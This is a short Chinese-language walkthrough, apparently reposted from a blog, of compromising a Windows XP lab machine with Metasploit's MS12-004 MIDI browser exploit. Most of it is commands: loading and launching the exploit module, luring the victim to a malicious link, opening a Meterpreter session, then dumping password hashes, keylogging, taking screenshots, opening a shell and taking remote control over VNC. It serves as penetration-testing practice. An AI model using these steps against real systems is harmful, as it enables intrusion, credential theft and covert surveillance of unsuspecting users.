记录一次完整的Metasploit测试!利用漏洞MS12-004
msfconsole
search ms12_004
Use exploits/windows/browser/ms12_004_midi
show options
最后 再输入show options ,查看是否设置好
Exploit
可以看到服务已经启动了,链接地址http://192.168.42.130:8080/在用Xp打开恶意链接地址 http://192.168.42.130:8080/
BackTrack 开始渗透,这边BT5已经有反应了 ,渗透成功
输入命令:>>>
Sessions
我们看到有一个会话,会话的 ID 是1 ,开打开这个会话,输入命令:>>>
Sessions -i 1
这时,我们已经进入了Meterpreter Meterpreter 是一个很强大的 payload , 具体说明输入 help 可以看到,
Meterpreter > hashdump // 可以看到远程主机帐号和加密后的密码
这里再说几个常用的Meterpreter 命令
Meterpreter > keyscan_start //开启键盘记录 Meterpreter > heyscan_dump // 查看键盘记录的内容 Meterpreter > keyscan_stop // 关闭键盘记录 Meterpreter > shell //看下图大家都懂的Meterpreter > ps // 获取远程主机进程列表,比windows自带的任务管理器清晰多了
Meterpreter > screenshot // 截取远程桌面屏幕
Meterpreter > run vnc // 开启远程主机vnc 服务
过一会,可以看到桌面,并且可以控制鼠标和键盘
3:我们重启远程主机试下,输命令:>>>
reboot
4:
Telnet 192.168.42.139 443
本文整理自:【http://blog.0x7c00.cn/?p=165】